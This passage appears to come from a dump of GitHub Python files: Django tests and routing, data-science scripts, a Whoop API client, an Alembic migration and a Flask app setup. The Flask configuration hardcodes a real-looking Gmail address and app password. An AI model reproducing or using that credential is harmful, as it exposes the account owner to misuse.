expected_template=self.expected_template, user=self.admin_user)\n\n\n @tag(\"branch_edit\", 'update', \"submit\")\n def test_submit(self):\n data = FactoryFloor.BranchFactory.get_valid_data()\n self.assert_success_url(self.test_url, data=data, user=self.admin_user)\n\n\nclass TestRegionUpdateView(CommonTest):\n def setUp(self):\n super().setUp()\n self.instance = FactoryFloor.RegionFactory()\n self.test_url = reverse_lazy('shared_models:region_edit', kwargs={\"pk\": self.instance.pk})\n self.expected_template = 'shared_models/org_form.html'\n self.admin_user = self.get_and_login_user(in_group=\"travel_admin\")\n\n @tag(\"region_edit\", 'update', \"view\")\n def test_view_class(self):\n 
self.assert_inheritance(views.RegionUpdateView, CommonUpdateView)\n self.assert_inheritance(views.RegionUpdateView, views.AdminRequiredMixin)\n\n @tag(\"region_edit\", 'update', \"access\")\n def test_view(self):\n self.assert_not_broken(self.test_url)\n self.assert_non_public_view(test_url=self.test_url, expected_template=self.expected_template, user=self.admin_user)\n\n\n @tag(\"region_edit\", 'update', \"submit\")\n def test_submit(self):\n data = FactoryFloor.RegionFactory.get_valid_data()\n self.assert_success_url(self.test_url, data=data, user=self.admin_user)\n","repo_name":"tynando/dm_apps","sub_path":"shared_models/test/test_update_views.py","file_name":"test_update_views.py","file_ext":"py","file_size_in_byte":4558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"64"} +{"seq_id":"24137823655","text":"import math\nimport array\nimport random\nimport sys\n\nRAND_MAX=2147483647\n\n\nclass Gaussian():\n def __init__(self):\n self.gauss_random = 0;\n self.available_gauss = 0;\n self.prev_mean = -100000;\n self.prev_variance = -10000;\n\n\ndef read_seed():\n fp = open(\"/dev/random\", \"rb\");\n seed=fp.read(sys.getsizeof(int))\n fp.close()\n return seed\n\ndef generate_seed():\n seed=read_seed()\n random.seed(seed)\n return seed\n\ndef generate_seed_verbose():\n seed=generate_seed()\n fp.write (\"seed: %x\\n\" % (seed))\n return seed\n\ndef uniform_random_():\n return (float(random.randint(0, RAND_MAX))/float(RAND_MAX))\n\ndef uniform_random(min, max):\n return ((uniform_random_()*(max-min))+min)\n \ndef uniform_int_random(min, max):\n return int(round(uniform_random(float(min)-0.499999, float(max)+0.499999)))\n\ndef gaussian_random(g, m, v):\n if (g.available_gauss==False or m!=g.prev_mean or v!=g.prev_variance):\n rsq=1.0\n rsq=0.0\n fac=0\n while(rsq>=1.0 or rsq==0.0):\n r1=uniform_random(-1,1)\n r2=uniform_random(-1, 1)\n rsq=r1*r1+r2*r2\n \n fac=math.sqrt((-2.0*math.log(rsq))/rsq)\n g.gauss_random=(r2*fac)*math.sqrt(v) + m;\n g.available_gauss = True;\n g.prev_mean = m;\n g.prev_variance = v;\n\n return (r1*fac)*math.sqrt(v) + m;\n\n else:\n g.available_gauss = False;\n return g.gauss_random;\n \n\ndef main(m,v):\n generate_seed()\n N=100\n sum=0\n gaussian=Gaussian()\n x=[]\n \n #print \"before loop\"\n for i in range (N):\n x.append(gaussian_random(gaussian, m, v))\n sum+=x[i]\n \"\"\"\n for i in range (N):\n print x[i]\n \"\"\"\n return (sum/float(N))\n\n#main(0.0, 4.0)\n\n","repo_name":"SajidQ/AI_CS382_Projects","sub_path":"002-Probabilistic_State_Estimation/PartB/Program/gaussian.py","file_name":"gaussian.py","file_ext":"py","file_size_in_byte":1728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"64"} +{"seq_id":"37268458630","text":"from sklearn.model_selection import ShuffleSplit, cross_validate, KFold\nfrom sklearn import datasets\nfrom sklearn.tree import DecisionTreeClassifier\nimport numpy as np\nfrom typing import Dict\n\n\ndef prepare_data(num_train=60000, num_test=10000, normalize=True):\n\n X, y = datasets.fetch_openml(\n \"mnist_784\",\n version = 1,\n return_X_y = True,\n as_frame = False\n )\n\n if normalize:\n X = X / X.max()\n\n y = y.astype(int)\n Xtrain, Xtest = X[:num_train], X[num_train:num_train + num_test]\n ytrain, ytest = y[:num_train], y[num_train:num_train + num_test]\n return Xtrain, ytrain, Xtest, ytest\n\n\ndef filter_out_7_9s(X, y):\n seven_nine_idx = (y == 7) | (y == 9)\n X_binary = X[seven_nine_idx, :]\n y_binary = y[seven_nine_idx]\n return X_binary, 
y_binary\n\n\ndef train_simple_classifier_with_cv(Xtrain,\n ytrain,\n clf,\n n_splits = 5,\n cv_class = KFold):\n\n cv = cv_class(n_splits=n_splits)\n scores = cross_validate(clf, Xtrain, ytrain, cv=cv)\n return scores\n\n\ndef print_cv_result_dict(cv_dict: Dict):\n for (key, array) in cv_dict.items():\n print(f\"mean_{key}: {array.mean()}, std_{key}: {array.std()}\")\n\n\nif __name__ == \"__main__\":\n Xtrain, ytrain, Xtest, ytest = prepare_data()\n Xtrain, ytrain = filter_out_7_9s(Xtrain, ytrain)\n Xtest, ytest = filter_out_7_9s(Xtest, ytest)\n\n out_dict = train_simple_classifier_with_cv(\n Xtrain,\n ytrain,\n DecisionTreeClassifier()\n )\n print(\"running cross validation...\")\n print_cv_result_dict(out_dict)\n","repo_name":"klionjarod/Grad-School","sub_path":"Spring 2022/CAP5771 - Data Mining/Coding HW/HW1 - Classification of MNIST/mnist_assignment_starter.py","file_name":"mnist_assignment_starter.py","file_ext":"py","file_size_in_byte":1689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"64"} +{"seq_id":"20979456843","text":"from django.urls import include, path\nfrom rest_framework_nested import routers\nfrom groups import views\n\napp_name = \"groups\"\n\nrouter = routers.SimpleRouter(trailing_slash=False)\nrouter.register(r\"groups\", views.GroupsModelViewSet, basename=\"groups\")\n\ngroups_router = routers.NestedSimpleRouter(router, r'groups', lookup='group', trailing_slash=False)\ngroups_router.register(r'members', views.MemberModelViewSet, basename='group-members')\ngroups_router.register(r'titles', views.ProjectTitleModelViewSet, basename='group-titles')\nrouter.register(r\"advisors\", views.AdvisorModelViewSet, basename=\"groups-advisor\")\nrouter.register(r\"examiners\", views.ExaminerModelViewSet, basename=\"groups-examiner\")\nrouter.register(r\"titles\", views.AllProjectTitleModelViewSet, basename=\"all-titles\")\n\nurlpatterns = [\n path(r'', include(router.urls)),\n path(r'', include(groups_router.urls)),\n path(\"check-similarity//\", views.similarity_check, name=\"check-similarity\"),\n path(\"approve-title/\", views.approve_title, name=\"approve-title\"),\n path(\"reject-title/\", views.reject_title, name=\"reject-title\"),\n] \n","repo_name":"aleale2121/project_management","sub_path":"app/groups/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"64"} +{"seq_id":"448408441","text":"import datetime\nimport pandas as pd\nimport requests\nimport streamlit as st\n\nwhoop_headers = {\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36',\n 'Content-Type': 'application/json;charset=UTF-8',\n}\n\ndef get_clean_whoop_data():\n\n response = get_whoop_response()\n df = get_dataframe(response)\n\n return df\n\ndef get_dataframe(response):\n rolling_window = '14D'\n new_years_day = datetime.date(2020, 12, 31)\n\n df = (\n pd.DataFrame(parse_response(response))\n .query('rem == rem')\n .assign(\n dt = lambda x: x['dt'].apply(lambda x: pd.to_datetime(x)),\n average_rhr = lambda x: x.rolling(rolling_window, on = 'dt')['resting_heart_rate'].mean().to_numpy(),\n )\n .query('dt >= @new_years_day')\n )\n\n return df\n\ndef get_whoop_response():\n\n whoop_headers.update({'authorization': f'bearer {get_access_token()}'})\n\n params = (\n ('end', f'{get_today()}T04:59:59.999Z'),\n ('start', '2020-06-21T05:00:00.000Z'),\n )\n\n response = 
requests.get(\n 'https://api-7.whoop.com/users/340847/cycles',\n headers=whoop_headers,\n params=params\n )\n\n return response\n\ndef parse_response(response):\n\n parsed = []\n\n for element in response.json():\n dt = element['days'][0]\n whoop_id = element['id']\n sleeps = element['sleep']['sleeps']\n strain = element['strain']['score']\n if element['recovery']:\n rhv = element['recovery'].get('heartRateVariabilityRmssd')\n\n for sleep in sleeps:\n rem = sleep['remSleepDuration']\n deep = sleep['slowWaveSleepDuration']\n in_bed = sleep['inBedDuration']\n respiratory_rate = sleep['respiratoryRate']\n\n row = {\n 'dt': dt,\n 'whoop_id': whoop_id,\n 'rem': rem,\n 'deep': deep,\n 'strain': strain,\n 'rhv': rhv,\n 'in_bed': in_bed,\n 'resting_heart_rate': element['recovery']['restingHeartRate'],\n 'respiratory_rate': respiratory_rate,\n }\n parsed.append(row)\n\n return parsed\n\ndef get_today():\n return str(datetime.datetime.today().date())\n\ndef get_access_token():\n response = requests.post(\n 'https://api-7.whoop.com/oauth/token',\n headers=whoop_headers,\n data=st.secrets['WHOOP_TOKEN_CREDENTIALS']\n )\n\n return response.json()['access_token']\n","repo_name":"BrandonEmmerich/health-app","sub_path":"health_app/get_whoop.py","file_name":"get_whoop.py","file_ext":"py","file_size_in_byte":2628,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"64"} +{"seq_id":"2485155389","text":"import os\nfrom os import urandom\nfrom flask import Flask\nfrom flask_login import LoginManager, current_user\nfrom flask_mail import Mail\nfrom flask_sqlalchemy import SQLAlchemy\n\napp = Flask(__name__)\n\napp.config[\"SECRET_KEY\"] = urandom(32)\n\nif os.environ.get(\"HEROKU\"):\n app.config[\"SQLALCHEMY_DATABASE_URI\"] = os.environ.get(\"DATABASE_URL\")\nelse:\n app.config[\"SQLALCHEMY_DATABASE_URI\"] = \"sqlite:///books.db\"\n app.config[\"SQLALCHEMY_ECHO\"] = True\n\ndb = SQLAlchemy(app)\n\n# kirjautuminen\n\nlogin_manager = LoginManager()\nlogin_manager.init_app(app)\n\nlogin_manager.login_view = \"auth_login\"\nlogin_manager.login_message = \"Tämä toiminto vaatii kirjautumisen.\"\nlogin_manager.login_message_category = 'info'\n\nmail = Mail(app)\n\napp.config['MAIL_SERVER'] = 'smtp.gmail.com'\napp.config['MAIL_PORT'] = 465\napp.config['MAIL_USE_TLS'] = False\napp.config['MAIL_USE_SSL'] = True\napp.config['MAIL_USERNAME'] = 'tsohakirjahylly@gmail.com'\napp.config['MAIL_PASSWORD'] = 'nuxhatnhlegfdkfr'\nmail = Mail(app)\nmail.init_app(app)\n\nfrom functools import wraps\n\n\ndef login_required(role=\"ANY\"):\n def wrapper(fn):\n @wraps(fn)\n def decorated_view(*args, **kwargs):\n if not current_user:\n return login_manager.unauthorized()\n\n if not current_user.is_authenticated:\n return login_manager.unauthorized()\n\n unauthorized = False\n\n if role != \"ANY\":\n unauthorized = True\n\n if current_user.role == role:\n unauthorized = False\n\n if unauthorized:\n return login_manager.unauthorized()\n\n return fn(*args, **kwargs)\n\n return decorated_view\n\n return wrapper\n\n\n# oman sovelluksen toiminnallisuudet\nfrom application import views\n\nfrom application.books import models\nfrom application.books import views\n\nfrom application.auth import models\nfrom application.auth import views\n\nfrom application.authors import models\nfrom application.authors import views\n\n# kirjautuminen osa 2\n\nfrom application.auth.models import User\nfrom application.auth.models import users_books\n\n\n@login_manager.user_loader\ndef load_user(user_id):\n return 
User.query.get(user_id)\n\n\n# taulut tarvittaessa tietokantaan\ntry:\n db.create_all()\nexcept:\n pass\n","repo_name":"riinaalisah/Kirjahylly","sub_path":"application/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"64"} +{"seq_id":"8620561190","text":"import numpy as np\nfrom scipy.special import logsumexp\nimport traceback\n\nfrom logsign import *\n\ndef test_test_ls():\n return True\n\n\ndef test_real2ls():\n try:\n x = real2ls(4.0)\n assert x['mag'] == np.log(4)\n assert x['sgn'] == 1\n\n x = real2ls(-3)\n assert x['mag'] == np.log(3)\n assert x['sgn'] == -1\n\n x = real2ls(0.0)\n assert x['mag'] == -np.inf\n assert x['sgn'] == 0\n except AssertionError:\n print(traceback.format_exc())\n\n return False\n else:\n return True\n\n\ndef test_ls2real():\n try:\n x = real2ls(4.0)\n z = ls2real(x)\n assert np.isclose(z, 4.0)\n\n x = real2ls(-3)\n z = ls2real(x)\n assert np.isclose(z, -3)\n\n x = real2ls(0.0)\n z = ls2real(x)\n assert np.isclose(z, 0.0)\n except AssertionError:\n print(traceback.format_exc())\n\n return False\n else:\n return True\n\n\ndef test_isls():\n return True\n\n\ndef test_ls_add():\n try:\n print()\n except AssertionError:\n print(traceback.format_exc())\n\n return False\n else:\n return True\n\n\ndef test_ls_sum():\n try:\n print()\n except AssertionError:\n print(traceback.format_exc())\n\n return False\n else:\n return True\n\n\ndef test_ls_mul(x, y):\n \"\"\"multiply two numbers (or vectors of numbers) in log-sign space\"\"\"\n assert isls(x) and isls(y)\n assert x.shape == y.shape\n\n z = np.empty_like(x)\n z['mag'] = x['mag'] + y['mag']\n z['sgn'] = x['sgn'] * y['sgn']\n\n return z\n\n\ndef test_ls_exp(x):\n \"\"\"exponentiate a number (or vector of numbers) in log-sign space\"\"\"\n assert isls(x)\n\n z = np.empty_like(x)\n z['mag'] = x['sgn'] * np.exp(x['mag'])\n z['sgn'] = 1\n\n return z\n\n\ndef test_ls_log(x):\n \"\"\"compute the log of a number (or vector) in log-sign space\"\"\"\n assert isls(x)\n\n z = np.empty_like(x)\n if x['sgn'] == 1:\n # x is already the desired quantity in linear space, we just need to go one layer deeper\n z['mag'] = np.log(x['mag'])\n z['sgn'] = np.sign(x['mag'])\n elif x['sgn'] == 0:\n # log(0) = -inf, but in ls-space\n z['mag'] = np.inf\n z['sgn'] = -1\n else: # x['sgn'] == -1:\n # log(x \\in Z^-) = nan\n # TODO: warning?\n z['mag'] = np.nan\n z['sgn'] = np.nan\n\n return z\n\n\nif __name__ == \"__main__\":\n print(\"test_real2ls: %s\" % test_real2ls())\n print(\"test_ls2real: %s\" % test_ls2real())","repo_name":"kwinner/latentcountmodels","sub_path":"archive/lsgdual/python/kevin/test_logsign.py","file_name":"test_logsign.py","file_ext":"py","file_size_in_byte":2504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"64"} +{"seq_id":"9726336880","text":"class ticket():\r\n def __init__(self,adult=True,weekend=False):#默认是成人,如不是需声明,默认是工作日\r\n self.ticket=100\r\n if adult==True:\r\n self.discount=1\r\n else:\r\n self.discount=0.5\r\n\r\n if weekend==True:\r\n self.inc=1.2\r\n else:\r\n self.inc=1\r\n\r\n def price(self,num): #self指的是定义的函数本身,是具体的实例化对象的名字\r\n return self.ticket*self.discount*self.inc*num\r\n\r\nadult=ticket()\r\nchild=ticket(adult=False)\r\nnum_adult=input('请输入成人数量:')\r\nnum_child=input('请输入小孩数量:')\r\ntotal_price=adult.price(int(num_adult))+child.price(int(num_child))\r\nprint(\"%s个成人和%s个小孩的平日票价为%s\"%(num_adult,num_child,total_price))\r\n \r\n \r\n 
\r\n \r\n","repo_name":"kunkun1230/Homework","sub_path":"类定义成人和小孩票价.py","file_name":"类定义成人和小孩票价.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"zh","doc_type":"code","stars":4,"dataset":"github-code","pt":"64"} +{"seq_id":"21728073234","text":"import numpy as np\nfrom pyqubo import Array, solve_ising\n\nN = 10\n\nif __name__ == '__main__':\n data = np.random.random(N)\n data /= data.sum()\n data = np.array([1, 2000, 1000, 1001])\n print(data)\n\n spin = Array.create('spin', shape=len(data), vartype='SPIN')\n H = (sum([data[i] * spin[i] for i in range(len(data))]))**2\n model = H.compile()\n h, j, _ = model.to_ising()\n solution = solve_ising(h, j)\n decoded = model.decode_sample(solution, vartype='SPIN')\n labels = np.array([decoded.array('spin', idx) for idx in range(len(data))])\n print(f\"{data[labels>0]}: {data[labels>0].sum()})\")\n print(f\"{data[labels<0]}: {data[labels<0].sum()})\")\n","repo_name":"takerun0728/practice-optimization","sub_path":"number_partitioning.py","file_name":"number_partitioning.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"64"} +{"seq_id":"36218740014","text":"# Databricks notebook source\nfrom pyspark.sql.functions import col, sum, when, count\n\n# COMMAND ----------\n\ndbutils.widgets.text(\"p_file_date\",\"2021-03-21\")\nv_file_date=dbutils.widgets.get(\"p_file_date\")\n\n# COMMAND ----------\n\n# MAGIC %run \"/Formula1/includes/common_functions\"\n\n# COMMAND ----------\n\n# MAGIC %run \"/Formula1/includes/configuration\"\n\n# COMMAND ----------\n\nrace_results_list=spark.read.format(\"delta\").load(f\"{presentation_folder_path}/race_results\") \\\n .filter(f\"file_date='{v_file_date}'\") \\\n .select(\"race_year\") \\\n .distinct() \\\n .collect()\nrace_year_list=[i.race_year for i in race_results_list]\n\n# COMMAND ----------\n\nrace_results_df=spark.read.format(\"delta\").load(f\"{presentation_folder_path}/race_results\") \\\n .filter(col(\"race_year\").isin(race_year_list))\n\n# COMMAND ----------\n\ndisplay(race_results_df)\n\n# COMMAND ----------\n\nfrom pyspark.sql.functions import sum,when,count,col\n\n# COMMAND ----------\n\nconstructor_standings_df=race_results_df.groupBy(\"race_year\",\"team\") \\\n .agg(sum(\"points\").alias(\"total_points\"),count(when(col(\"position\")==1,True)).alias(\"wins\"))\n\n# COMMAND ----------\n\ndisplay(constructor_standings_df.filter(\"race_year==2020\"))\n\n# COMMAND ----------\n\nfrom pyspark.sql.window import Window\nfrom pyspark.sql.functions import desc,rank,asc\n\n# COMMAND ----------\n\nconstructor_rank_spec=Window.partitionBy(\"race_year\").orderBy(desc(\"total_points\"), desc(\"wins\"))\n\n# COMMAND ----------\n\nfinal_df=constructor_standings_df.withColumn(\"rank\",rank().over(constructor_rank_spec))\n\n# COMMAND ----------\n\ndisplay(final_df.filter('race_year = 2020'))\n\n# COMMAND ----------\n\n# final_df.write.mode('overwrite').format(\"parquet\").saveAsTable(\"f1_presentation.constructor_standings\")\n# incremental_load(final_df,\"f1_presentation\",\"constructor_standings\",\"race_year\")\nmerge_condition=\"tgt.team=src.team AND tgt.race_year=src.race_year\"\nmerge_delta_data(final_df,\"f1_presentation\",\"constructor_standings\",presentation_folder_path,\"race_year\",merge_condition)\n\n# COMMAND 
----------\n\n","repo_name":"Rupsa25/Formula1_Project","sub_path":"trans/3.constructor_standings.py","file_name":"3.constructor_standings.py","file_ext":"py","file_size_in_byte":2028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"64"} +{"seq_id":"8315087485","text":"import pytest\nfrom pydantic import ValidationError\n\nfrom devmaua.src.enum.tipo_email import TipoEmail\n\nfrom devmaua.src.models.email import Email\n\nclass Test_Email():\n \n def test_create_instance_model(self):\n email = Email(email='teste@teste.com',\n tipo=TipoEmail.PRIVADO,\n prioridade = 1)\n assert email.email == 'teste@teste.com'\n assert email.tipo == TipoEmail.PRIVADO\n assert email.prioridade == 1\n \n def test_validator_error_email(self):\n with pytest.raises(ValidationError) as error_info:\n email = Email(email='teste@.teste.com',\n tipo=TipoEmail.PRIVADO,\n prioridade = 1)\n \n def test_criar_email_por_dict(self):\n d = {\n \"email\": \"teste@teste.com\",\n \"tipo\": 1,\n \"prioridade\": 1\n }\n \n email = Email.criarEmailPorDict(d)\n \n assert email.email == 'teste@teste.com'\n assert email.tipo == TipoEmail.PRIVADO\n assert email.prioridade == 1","repo_name":"Maua-Dev/models_devmaua","sub_path":"devmaua/test/models/test_email.py","file_name":"test_email.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"64"} +{"seq_id":"37065597665","text":"from random import randrange\nfrom src.chromosome import Chromosome\n\n\ndef initialisation(myChromosome): # done\n tempChromosome = myChromosome()\n for i in range(Chromosome.numTasks):\n tempChromosome.append(0)\n for j in range(len(Chromosome.data)):\n k = randrange(0, Chromosome.numProcs)\n tempChromosome[j] = k\n return tempChromosome\n","repo_name":"infiniator/NSGA","sub_path":"src/genetic_algorithm.py","file_name":"genetic_algorithm.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"64"} +{"seq_id":"73294321803","text":"\"\"\"Add authorization code\n\nRevision ID: e5372087492f\nRevises: c90db4410eab\nCreate Date: 2023-08-23 00:01:10.260620\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'e5372087492f'\ndown_revision = 'c90db4410eab'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! 
###\n op.create_table('authorizationcodes',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('expire_on', sa.DateTime(), nullable=True),\n sa.Column('client_id', sa.String(), nullable=True),\n sa.ForeignKeyConstraint(['client_id'], ['clients.client_id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_authorizationcodes_id'), 'authorizationcodes', ['id'], unique=False)\n op.create_table('authorizationcode_permission',\n sa.Column('authorization_code_id', sa.Integer(), nullable=False),\n sa.Column('permission_id', sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint(['authorization_code_id'], ['authorizationcodes.id'], ),\n sa.ForeignKeyConstraint(['permission_id'], ['permissions.id'], ),\n sa.PrimaryKeyConstraint('authorization_code_id', 'permission_id')\n )\n op.alter_column('clients', 'client_id',\n existing_type=sa.VARCHAR(),\n nullable=False)\n op.drop_index('ix_clients_id', table_name='clients')\n op.drop_column('clients', 'id')\n # ### end Alembic commands ###\n\n\ndef downgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('clients', sa.Column('id', sa.INTEGER(), autoincrement=True, nullable=False))\n op.create_index('ix_clients_id', 'clients', ['id'], unique=False)\n op.alter_column('clients', 'client_id',\n existing_type=sa.VARCHAR(),\n nullable=True)\n op.drop_table('authorizationcode_permission')\n op.drop_index(op.f('ix_authorizationcodes_id'), table_name='authorizationcodes')\n op.drop_table('authorizationcodes')\n # ### end Alembic commands ###\n","repo_name":"Binimow/authentiraptor","sub_path":"src/authorizationserver/backend/alembic/versions/e5372087492f_add_authorization_code.py","file_name":"e5372087492f_add_authorization_code.py","file_ext":"py","file_size_in_byte":2058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"64"} +{"seq_id":"13630925683","text":"#Note : An Iterator is an object that contains a countable number of values .\n#Consists of 2 methods (__iter__ and __next__())\n\nlist1 = [1,2,3,4,5,6]\nlst = iter(list1)\nprint(next(lst))\nprint(next(lst))\nprint(next(lst))\nprint(next(lst))\n\n#Output\n'''\n1\n2\n3\n4\n'''\n#Stop after 10 iteration\nclass Numbers:\n def __iter__(self):\n self.a = 1\n return self\n\n def __next__(self):\n if self.a <= 10:\n x = self.a\n self.a += 1\n return x\n else:\n raise StopIteration\n\nobj1 = Numbers()\nmyiter = iter(obj1)\n\nfor x in myiter:\n print(x)\n\n#Output\n'''\n1\n2\n3\n4\n1\n2\n3\n4\n5\n6\n7\n8\n9\n10\n'''","repo_name":"BrindaSahoo2020/Python-Programs","sub_path":"Iterator.py","file_name":"Iterator.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"64"} +{"seq_id":"39746656184","text":"# Multiplication table printer... 
3rd attempt\n\ndef multi_table(b):\n\n for i in range(1, b+1):\n if b % 1 == 0:\n print('{0} x {1} = {2}'.format(a, i, a*i))\n\nif __name__ == '__main__':\n a = input('Enter a number: ')\n b = input('Enter a range: ')\n b = float(b)\n","repo_name":"mathewcmartin/wrksp","sub_path":"mlt_tbl.py","file_name":"mlt_tbl.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"64"} +{"seq_id":"2934264340","text":"from datetime import datetime # to get the current date and time\n\n\ndef log(log_message):\n \"\"\"\n - DOES: adds a log message \"log_message\" and its time stamp to a log file.\n \"\"\"\n\n # open the log file and make sure that it's closed properly at the end of the\n # block, even if an exception occurs:\n with open(\"log.txt\", \"a\") as log_file:\n # write the current time stamp and log message to logfile:\n log_file.write(datetime.strftime(datetime.today(),\n \"%Y-%m-%d %H:%M:%S\") + \": \" + log_message)\n log_file.write(\"\\n\") # (so the next message is put on a new line)\n\n","repo_name":"saikrishnarallabandi/compositionality-expts","sub_path":"01_captions/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"64"} +{"seq_id":"1640573485","text":"#!/usr/bin/env python3\n\nimport json\nimport re\n\nimport requests\n\nfrom utils import update_feed\n\n\njson_feed = {\n 'version': 'https://jsonfeed.org/version/1.1',\n 'title': 'Denver Housing Justice News',\n 'home_page_url': 'https://sreynen.github.io/denver-housing-justice/',\n 'feed_url': 'https://sreynen.github.io/denver-housing-justice/feed.json',\n 'items': []\n}\n\nfilter_key_phrases = [\n 'house prices', 'housing',\n 'homeless', 'homelessness', 'unhoused',\n 'evict', 'eviction',\n 'rent',\n 'property tax', 'property taxes',\n 'living on city streets', 'living on the streets'\n]\nresponse = requests.get('https://sreynen.github.io/denver-news/feed.json')\nsource_json_feed = json.loads(response.text)\nfor item in source_json_feed.get('items'):\n match = False\n title_words = re.findall(r\"[\\w']+\", item.get('title', ''))\n title_substring = ' '.join([word.lower() for word in title_words]).lower()\n title_string = f\" {title_substring} \"\n for phrase in filter_key_phrases:\n phrase_string = f\" {phrase} \"\n if phrase_string in title_string:\n match = True\n if match:\n json_feed['items'].append(item)\n\nupdate_feed('./docs/feed.json', json_feed)\n","repo_name":"sreynen/denver-housing-justice","sub_path":"scrape_news.py","file_name":"scrape_news.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"64"} +{"seq_id":"44079458085","text":"import re\nf = open('../data/training_text')\n\nfor doc in f:\n # print(doc[:20])\n m = re.match(r'^\\d+\\|\\|(.*)$',doc)\n if m: \n content = m.group(1) \n sentences = content.split('.')\n for s in sentences:\n print(s.strip()) ","repo_name":"anachanpapa/AI-NLP-engineer-trial","sub_path":"scripts/OTHERS/doc2sentences.py","file_name":"doc2sentences.py","file_ext":"py","file_size_in_byte":239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"64"} +{"seq_id":"15825987121","text":"# Jing-Kai Lou (kaeaura@gamil.com)\n\nimport os\nimport sys\nsys.path.append('analyzer')\nimport matplotlib.pylab as plt\nfrom db import LiteDB\n\n\ndef load_data(path, file_dict):\n\tall_dbs = 
os.listdir(path)\n\tassert(set(all_filenames.values()).issubset(set(all_dbs)))\n\tdb = LiteDB()\n\tall_keynames = {}\n\tread_keynames = set()\n\tfor read_tracename, read_filename in all_filenames.iteritems():\n\t\tdb.load(os.path.join(path, read_filename))\n\t\tread_keyname = set(db.keys()).difference(read_keynames).pop()\n\t\tall_keynames.__setitem__(read_tracename, read_keyname)\n\t\tread_keynames.add(read_keyname)\n\treturn(db, all_keynames)\n\npowerlaw = lambda x, amp, index: amp * (x**index)\n\ndef insert_ks_table(db, keynames, save_path):\n\t\"\"\"docstring for insert_ks_table\"\"\"\n\tindeg_x_name = 'inDegDistr_x'\n\tindeg_y_name = 'inDegDistr_y'\n\tindeg_fit = 'inDegDistr_fit'\n\toutdeg_x_name = 'outDegDistr_x'\n\toutdeg_y_name = 'outDegDistr_y'\n\toutdeg_fit = 'outDegDistr_fit'\n\n","repo_name":"kaeaura/churn_prediction_proj","sub_path":"paper_tabler.py","file_name":"paper_tabler.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"64"} +{"seq_id":"2772194536","text":"# В целом надо все функции менять, тк сейчас используется update_or_create()\r\n# Он нам не подходит, тк он обновляет записи в базе данных без каких либо проверок\r\n# (пока переделал только update_or_create_post)\r\n#\r\n# Также, скорее всего, надо будет все методы изменить на bulk_create() и bulk_update()\r\n\r\n\r\nimport os\r\nimport time\r\n\r\nimport django\r\n\r\nfrom data.config import urls_for_update_db_data as urls\r\n\r\n\r\ndef setup_django():\r\n \"\"\"\r\n Настраивает Django\r\n\r\n При запуске HTTP сервера и выполнении команды Django это происходит автоматически\r\n \"\"\"\r\n os.environ.setdefault(\r\n \"DJANGO_SETTINGS_MODULE\",\r\n \"cool_posts_site.settings\"\r\n )\r\n django.setup()\r\n\r\n\r\ndef update_db_data():\r\n \"\"\"\r\n Обновляет записи в БД\r\n\r\n Доделать:\r\n добавить проверки на ошибки\r\n \"\"\"\r\n keys = {\r\n 'users': update_or_create_user,\r\n 'posts': update_or_create_post\r\n }\r\n\r\n while True:\r\n for key, url in urls.items():\r\n current_key_function = keys[key]\r\n data = get_json(url)\r\n\r\n for item in data:\r\n current_key_function(item)\r\n\r\n time.sleep(60 * 60) # Останавливает выполнение на 60 минут\r\n\r\n\r\nif __name__ == '__main__':\r\n setup_django()\r\n from utils.update_db_data.update_utils import get_json, update_or_create_user, update_or_create_post\r\n\r\n update_db_data()\r\n","repo_name":"Moussiao/Test-task","sub_path":"utils/update_db_data/update_db_data.py","file_name":"update_db_data.py","file_ext":"py","file_size_in_byte":1711,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"64"} +{"seq_id":"24533546797","text":"import utils.API_Responses as Responses\nimport utils.Dynamo as Dynamo\nfrom botocore.exceptions import ClientError\nimport pandas as pd\nimport plotly.figure_factory as ff\n\ndef handler(event, context):\n try:\n response = Dynamo.query(\n KeyConditionExpression=\"PK=:PK\",\n ExpressionAttributeValues={\n \":PK\": \"SOLUTION\",\n },\n 